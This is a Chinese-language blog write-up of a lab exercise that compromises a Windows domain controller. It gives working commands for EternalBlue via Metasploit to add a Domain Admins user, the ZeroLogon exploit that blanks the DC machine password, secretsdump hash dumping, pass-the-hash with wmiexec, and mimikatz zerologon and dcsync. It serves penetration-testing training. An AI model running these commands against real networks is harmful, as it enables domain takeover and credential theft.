无境·U Lab_ZeroLogon练习(康复训练)
Charmersix

好久没有打靶场了,今天来练习一下,先打个简单点的:ZeroLogon,打个域控做做康复训练

信息收集

拿到一个IP,别的信息没有,当然从题目我们大概知道了考点,真实环境肯定不会告诉你考点的
OK,我管他这那的,我先扫一梭子看看什么情况

image-20260815193424533

OK,没扫到漏洞,但是扫到了高危端口,134和445,那么这两个端口分别可以打什么呢?我们可以让ai来总结一下

首先是445端口:

漏洞/风险说明典型检测/利用
MS17-010 EternalBlueSMBv1 远程代码执行,影响 Win XP/7/2003/2008 等未打补丁系统nmap --script smb-vuln-ms17-010 -p445;MSF exploit/windows/smb/ms17_010_eternalblue
SMBGhost(CVE-2020-0796)SMBv3 压缩机制 RCE/LPE,影响 Win10 1903/1909、Server 2019nmap --script smb-protocols;专用扫描脚本;利用可能导致蓝屏,需谨慎
PrintNightmare(CVE-2021-34527)打印服务远程代码执行,常通过 SMB/Spooler 触发检查 MS-RPRN 接口;有专门 PoC
空会话/来宾访问配置不当时可匿名枚举共享、用户、SID、组策略enum4linux-ng -A <IP>crackmapexec smb <IP> -u '' -p '' --shares
弱口令/口令喷洒/哈希传递若存在弱口令,可直接登录 SMB;获得哈希后可 Pass-the-Hashcrackmapexec smb <IP> -u user -p passimpacket-psexec
SMB 签名未强制可导致 NTLM relay、中间人攻击nmap --script smb-security-mode
SMB relay + 强制认证结合 PetitPotam/PrinterBug 强制目标认证,中继到 LDAP/AD CS 可域提权impacket-ntlmrelayx + PetitPotam.py

然后是135端口:

漏洞/风险说明典型检测/利用
MS03-026(DCOM RPC)Windows 2000/XP/2003 等老系统远程代码执行极老系统;MSF 有对应模块
MS08-067(NetAPI)经典 RPC 服务漏洞,影响 XP/2003/Vista/2008 等,实际利用通常走 445 命名管道MSF exploit/windows/smb/ms08_067_netapi
ZeroLogon(CVE-2020-1472)Netlogon RPC 协议漏洞,可重置域控机器账户密码,直接接管域控zerologon_tester.py
PetitPotam(CVE-2021-36942)通过 MS-EFSRPC 接口强制目标主机认证,无需凭据PetitPotam.py;常配合 NTLM relay
PrinterBug / SpoolSample通过 MS-RPRN 接口强制认证,类似 PetitPotamrpcdump.py 检查 MS-RPRNSpoolSample.exe
RPC 接口枚举可发现大量攻击面(任务计划、注册表、DCOM 对象等)impacket-rpcdump -p 135 <IP>
DCOM 横向移动已获得凭据时,可通过 DCOM 对象执行命令(MMC20.Application、ShellWindows 等)impacket-dcomexec

445端口攻击

我们拿nmap扫一下,只能扫到17-010漏洞

image-20260816123512920

永恒之蓝,老生常谈了,我们直接拿msf打一下试试,直接弹shell失败了,可能是因为这个操作系统版本比较高,或者是其他什么问题导致弹不出来,不过没关系,我们可以通过命令执行的方式写入一个用户,因为我们早就知道开了3389端口,所以直接加个用户进去rdp登录

1
2
3
4
5
6
7
8
9
#添加用户hacker2进去
set COMMAND net user hacker2 P@ssw0rd /add /domain
run
#将用户加入 Domain Admins 组
set COMMAND net group \"Domain Admins\" hacker2 /add /domain
run
#验证域管理员权限
set COMMAND net user hacker2 /domain
run

OK,这里是直接添加成功了

image-20260816124158505

直接登录进去看看,flag在C盘

1
rdesktop -u myd\\hacker2 -p 'P@ssw0rd' 192.168.111.100

image-20260815201959720

135端口攻击

impacket 攻击

OK,直接拿脚本探测一下zerologon,我这里用的是这个脚本https://github.com/VoidSec/CVE-2020-1472

1
2
python3 cve-2020-1472-exploit.py -n 域主机名 -t 域控IP
python3 cve-2020-1472-exploit.py -n masterpc -t 192.168.111.100

image-20260816142122394

这里直接把域控机器的密码置空了,然后我们可以用空密码dump一下所有hash

1
2
python3 secretsdump.py 域名称/域控主机名\$@域控IP -no-pass
python3 secretsdump.py myd.com/masterpc\$@192.168.111.100 -no-pass

image-20260816142847195

这里可以拿到域内所有用户的hash,这里可以解一下administrator密码

image-20260816143724377

OK,直接rdp进去

image-20260816143851830

远程连接域控PTH攻击,这里用wmiexec

现在已经有了域管的hash了,就可以使用PTH攻击了,这里可以用wmiexec.py进行登录

image-20260816145608850

同理,也可以登录到其他域内机器。

这个题目由于我们本身攻击机器也在域内,所以直接打域控即可,域内其实还有另一台机器是win10

image-20260816151227468

mimikatz 攻击

所以,还有另一种手法是用mimikatz,这里模拟的是我们先拿到里域内机器win10

1
2
mimikatz.exe "privilege::debug" "lsadump::zerologon /target:域控IP /account:域机器账户名" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::zerologon /target:192.168.111.100 /account:masterpc$" "exit"

image-20260816153708073

OK,可以发现漏洞是存在的,这里直接打

1
2
mimikatz.exe "lsadump::zerologon /target:域控IP /ntlm /null /account:域机器名 /exploit" "exit"
./mimikatz.exe "lsadump::zerologon /target:192.168.111.100 /ntlm /null /account:masterpc$ /exploit" "exit"

image-20260816154856760

导出hash即可

1
2
mimikatz.exe "lsadump::dcsync /csv /domain:myd.com /dc:域控的FQDN /user:administrator /authuser:域控主机名$ /authpassword:\"\" /authntlm" "exit"
mimikatz.exe "lsadump::dcsync /csv /domain:myd.com /dc:masterpc.myd.com /user:administrator /authuser:masterpc$ /authpassword:\"\" /authntlm" "exit"

image-20260816155543439

 Comments